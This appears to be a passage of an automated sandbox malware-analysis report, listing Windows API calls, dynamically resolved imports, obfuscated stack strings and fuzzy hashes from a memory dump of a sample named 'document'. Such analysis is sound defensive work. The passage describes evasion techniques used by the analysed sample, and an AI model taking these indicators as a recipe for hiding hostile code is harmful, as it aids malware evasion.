                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,004292FE,?,0042EAB8,00000008,00429335,?,00000001,00000000,00426648,00000003), ref: 00429195
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004291A5
                                                                  • ExitProcess.KERNEL32 ref: 004291B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 75539706-1276376045
                                                                  • Opcode ID: 8c2fa50a3ec66fd577a0b8e8636169e5e6d711be195023716ce747e76f4f0db8
                                                                  • Instruction ID: 837725cd5bd8d62ceb7a805311689d2544094357cd19b3e86fc30850f48944c8
                                                                  • Opcode Fuzzy Hash: 8c2fa50a3ec66fd577a0b8e8636169e5e6d711be195023716ce747e76f4f0db8
                                                                  • Instruction Fuzzy Hash: BBD0E730344321EBE6111B73ED1D77B7A65BF41B41B944439B845D0160DB75CC21991D
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0041230F
                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00412329
                                                                  • SetFilePointer.KERNELBASE(00000000,000000FC,00000000,00000002), ref: 00412353
                                                                  • ReadFile.KERNELBASE ref: 00412370
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412377
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                                  • String ID:
                                                                  • API String ID: 1352878660-0
                                                                  • Opcode ID: 287adf819acc85caeaf54933d95270eb436911dfc7abba11b07640b1e6699bc0
                                                                  • Instruction ID: c542780b36d63bd1f74abcbd7efe17dbbb97c44db4b19d55b56e5dd6763cd24b
                                                                  • Opcode Fuzzy Hash: 287adf819acc85caeaf54933d95270eb436911dfc7abba11b07640b1e6699bc0
                                                                  • Instruction Fuzzy Hash: 0C11A171644360ABE324EB65EC46FEA33A8BB89710F800929F761961D0D7F45644CB9B
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00431E18,00000000,00000000,00431CAC,00431C98,0041FCDD,?,00431CAC,?,00431CAC,?,?,?,?,?,00000001), ref: 0041F111
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0041F11D
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,00000001), ref: 0041F135
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0041F140
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorEventHandleLastObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 5396149-0
                                                                  • Opcode ID: 7fabdc887b76636cf33a9a3860f0f978fa08689d0529247d9dc893de2f94b650
                                                                  • Instruction ID: 41ec93761c571e6fbe91694ad29752271d04f397154ed630bd7477d7537eb11e
                                                                  • Opcode Fuzzy Hash: 7fabdc887b76636cf33a9a3860f0f978fa08689d0529247d9dc893de2f94b650
                                                                  • Instruction Fuzzy Hash: 1CF01D35344220AFD3619F65DC48BABB7A4EF56311F018836FD458B390CB74AC52CBA5
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00425E5F,00000001,?,0042E598,00000060), ref: 00428480
                                                                    • Part of subcall function 004284C0: HeapAlloc.KERNEL32(00000000,00000140,004284A8,000003F8,?,0042E598,00000060), ref: 004284CD
                                                                  • HeapDestroy.KERNEL32(?,0042E598,00000060), ref: 004284B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 6464811ea9addaf19c19e5f0393c9d87aba79a32682558a56be755e4c38de286
                                                                  • Instruction ID: 3fe268917fd00d31aa756ebf7d8a68b1e22f7c153431ead6360d70d6e1d70485
                                                                  • Opcode Fuzzy Hash: 6464811ea9addaf19c19e5f0393c9d87aba79a32682558a56be755e4c38de286
                                                                  • Instruction Fuzzy Hash: A7E01A70B562129BEB147F316D0672E7AE49B84747F84587EB400C61A0FE788A459609
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(?,?), ref: 0041C738
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041C804
                                                                  • GetProcAddress.KERNEL32 ref: 0041C861
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041C8C5
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041C9A4
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041CA27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $#$$$$$$$$$&$&$&$&$($)$*$+$+$.$.$.$/$1$1$2$4$4$4$5$6$6$7$7$7$8$9$9$:$;$;$<$<$<$>$>$@$@$A$A$A$A$B$B$B$B$C$D$F$H$H$H$I$I$I$I$J$J$J$L$L$L$L$L$M$M$N$O$P$Q$R$R$S$S$S$S$S$S$S$T$T$T$T$W$W$W$W$X$X$Y$Z$[$[$\$^$_$_$`$`$`$`$a$a$b$c$c$c$d$d$d$d$d$e$e$e$e$e$e$f$f$g$g$g$h$h$h$h$i$i$k$l$m$n$n$n$n$n$n$n$o$o$o$p$p$q$r$r$r$s$s$t$t$t$t$t$t$u$u$v$v$w$w$w$x$x$x$y$z$|$|$~$~
                                                                  • API String ID: 2238633743-634024490
                                                                  • Opcode ID: c92be08d96a76fab994ce35617b86bcdcaf97940d9c7a17d779db1985a21b9f6
                                                                  • Instruction ID: f457ac551960ea605d3d070b3bc85a292eac30f70a1b7871ccb60a54743c72b9
                                                                  • Opcode Fuzzy Hash: c92be08d96a76fab994ce35617b86bcdcaf97940d9c7a17d779db1985a21b9f6
                                                                  • Instruction Fuzzy Hash: B8E2982000C7C2C9D332D63C984879FBFD51BA7228F584B9DE1E95A2E2D7A98149C777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$$$%$%$&$&$&$'$'$($)$)$)$*$*$+$-$-$-$.$.$.$/$/$1$2$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$>$?$?$@$B$C$D$E$E$E$E$E$E$F$F$G$H$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$N$O$O$P$P$T$T$U$V$V$W$Z$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$a$b$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$n$n$o$o$o$p$p$q$q$r$s$s$s$t$t$u$u$x$y$z${${$}$}$}$}
                                                                  • API String ID: 0-319044234
                                                                  • Opcode ID: fcd362075771919aa209d5a175f4e19b3383066e46c272e99d7fa23161f6263d
                                                                  • Instruction ID: 112317c9313a74c9b12a8399abeb6d4382841cb44c361794d62521e76ea744b4
                                                                  • Opcode Fuzzy Hash: fcd362075771919aa209d5a175f4e19b3383066e46c272e99d7fa23161f6263d
                                                                  • Instruction Fuzzy Hash: 1513B12000C7C29AD332C63898587DFBED55BA7328F588BADD1ED4A2D2D775020AD767
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,00000032), ref: 0041D1AD
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D28A
                                                                  • GetProcAddress.KERNEL32 ref: 0041D2E2
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D33A
                                                                  • GetProcAddress.KERNEL32(00000000,0000006B), ref: 0041D4A3
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041D53F
                                                                  • GetProcAddress.KERNEL32(00000000,0000009A), ref: 0041D637
                                                                  • GetProcAddress.KERNEL32(00000000,000000A5), ref: 0041D6A1
                                                                  • GetProcAddress.KERNEL32(00000000,000000EA), ref: 0041D718
                                                                  • GetProcAddress.KERNEL32(00000000,00000088), ref: 0041D80A
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D967
                                                                  • LoadLibraryA.KERNEL32(00000040), ref: 0041D9FF
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: #$$$$$$$$$&$&$($+$.$/$1$1$2$4$4$4$6$6$7$8$9$9$:$;$<$<$<$>$>$@$A$A$A$A$B$D$H$H$H$I$I$I$J$J$J$L$L$L$M$M$N$P$Q$R$S$S$S$S$S$S$S$T$T$T$W$W$W$W$X$X$Y$[$_$_$`$`$`$`$a$c$d$e$e$e$f$g$g$g$h$h$i$i$k$l$m$n$o$p$q$r$t$t$t$u$v$v$w$w$x$x$x$y$|$|$~
                                                                  • API String ID: 2238633743-1057226733
                                                                  • Opcode ID: 173a630b285c8d64dbb48f98fbb3aa5b36f8a7ac996510606186ed8d486715af
                                                                  • Instruction ID: 2d7c54381bbd094f02955be387350197a3f66cd921c6525618d4a2725f5bc4d0
                                                                  • Opcode Fuzzy Hash: 173a630b285c8d64dbb48f98fbb3aa5b36f8a7ac996510606186ed8d486715af
                                                                  • Instruction Fuzzy Hash: 5B829A2000C7C2C9D332C67C584879FBFD51BA7228F584B9DE1E95A2E2D7A9814AC777
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,74DF0440,74DF0440), ref: 0040C96E
                                                                  • lstrlenA.KERNEL32(?,?,?,00000002,?,00000000), ref: 0040CAE7
                                                                  • lstrlenA.KERNEL32(?), ref: 0040CAFA
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CC34
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 0040CCBA
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 0040CDD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: !$!$!$!$!$!$"$#$%$%$&$&$&$&u#&$'$'$'$($+$+$--%s$--%s--$.$.$/$/$0$0$0$0$0$1$2$3$3$4$4$4$4$4$5$5$6$7$8$8$8$8$8$9$9$9$:$:$:$:$:$<$<$<$<$<$=$>$?$@$A$A$E$E$E$F$K$M$P$P$Q$Q$T$U$U$W$X$X$Z$[$[$\$\$]$_$_$_$_$`$`$c$d$e$f$g$g$h$i$i$i$j$k$m$n$n$n$n$o$q$t$t$u$u$w$w$w$x$x$x
                                                                  • API String ID: 1659193697-105764249
                                                                  • Opcode ID: 6ebbdf2303aa1300f31e8ae64d91612264c5d94e1ec949d67e2f50ec83c66ff8
                                                                  • Instruction ID: 76a2d0d3a120653ea146fb598d041ca30ec9760fe042aa55d2c4b689ffa964e7
                                                                  • Opcode Fuzzy Hash: 6ebbdf2303aa1300f31e8ae64d91612264c5d94e1ec949d67e2f50ec83c66ff8
                                                                  • Instruction Fuzzy Hash: 40A2072110C7C1D9D332C738988878FBFD51BA7228F485B9DE1E85A2D2D7B98149C76B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$$$%$&$&$&$'$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$>$?$@$B$C$D$E$E$E$E$E$F$G$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$p$q$q$r$s$t$t$u$y${${$}$}$}$}
                                                                  • API String ID: 0-2726720408
                                                                  • Opcode ID: d90f52c8fe020ae98f048a66078bda6c6929cc3fb972793910aa825a6ba0364b
                                                                  • Instruction ID: c0d7f1d9a2f8d6b118605d4ad9cba7deefa6b9821a418fff6e8ca7fff8a3d635
                                                                  • Opcode Fuzzy Hash: d90f52c8fe020ae98f048a66078bda6c6929cc3fb972793910aa825a6ba0364b
                                                                  • Instruction Fuzzy Hash: 2CF2AF2000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$%$&$&$&$'$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$?$@$B$C$D$E$E$E$E$E$F$G$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$p$q$q$r$s$t$t$u$y${${$}$}$}$}
                                                                  • API String ID: 0-3452857728
                                                                  • Opcode ID: 1c6a306a2b6ec83f071b6c5e29ea358bffd991bd0d6fadaf44c47d54e099cf3b
                                                                  • Instruction ID: f89c03aa277b30708e93470f35b2be22918357344e2688cb743a074f04aa4e51
                                                                  • Opcode Fuzzy Hash: 1c6a306a2b6ec83f071b6c5e29ea358bffd991bd0d6fadaf44c47d54e099cf3b
                                                                  • Instruction Fuzzy Hash: 5AF2AF2000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$3$5$6$6$7$>$>$B$H$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$b$c$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$j$j$k$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$u$w$w$w$y$y$z$z
                                                                  • API String ID: 0-1641917991
                                                                  • Opcode ID: 2dc069aee45e8ea9a31442a3486fc2dfc51bd1cc8338bbaf5ed13638c82b4ca2
                                                                  • Instruction ID: c31594d21701e52a224cdcfe6db95929ccafb1db7881ef4c4193a4b74e5cc1ed
                                                                  • Opcode Fuzzy Hash: 2dc069aee45e8ea9a31442a3486fc2dfc51bd1cc8338bbaf5ed13638c82b4ca2
                                                                  • Instruction Fuzzy Hash: 5EA2AE2450D7C189E332C72884587DFBFD25BA6718F488E9EC4ED1B292C6BA0259C777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $&$'$'$)$)$,$,$,$,$,$0$0$0$0$3$3$3$4$4$6$8$:$:$:$;$=$?$A$A$C$E$E$E$E$E$H$I$I$J$L$L$L$N$N$N$O$O$O$P$P$P$T$T$T$Y$Y$Y:{$Y:{$Z$Z$Z$^$^$^$^$^$`$`$a$e$e$e$m$p$p$p$s$s$s$v$v$w$z$z${$|$|$|$|$|,T$|,T$|,T$}$}$~
                                                                  • API String ID: 0-75302382
                                                                  • Opcode ID: 9ebe39ba551fc4c6687707c0188dc31044f6a9c45a0b78eaedfd32ae9359fd65
                                                                  • Instruction ID: 0544d4bd05e75d62e2756a487d0dc6e4d92f5e832a14f0b3da5a45c8b404d5bb
                                                                  • Opcode Fuzzy Hash: 9ebe39ba551fc4c6687707c0188dc31044f6a9c45a0b78eaedfd32ae9359fd65
                                                                  • Instruction Fuzzy Hash: 2072A62010C7C189D322D73C945878FFFD55BA7228F585A9DE1E85B3D3C2AA8249C76B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$#$$$$$%$&$&$&$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$:$:$;$;$;$<$<$=$>$?$@$B$C$D$E$E$E$E$F$G$H$I$I$I$I$J$J$K$K$K$K$L$L$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$q$q$r$s$t$t$u${${$}$}$}
                                                                  • API String ID: 0-3297533030
                                                                  • Opcode ID: e80a43674b860d90563689f352579e04e32f56a1759b67cdd7fa77c80c7b27f3
                                                                  • Instruction ID: 082fff56f21fc62f50753e24676e63cce44abcfe45e5a024b0e2de527967505b
                                                                  • Opcode Fuzzy Hash: e80a43674b860d90563689f352579e04e32f56a1759b67cdd7fa77c80c7b27f3
                                                                  • Instruction Fuzzy Hash: 08E2A02000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
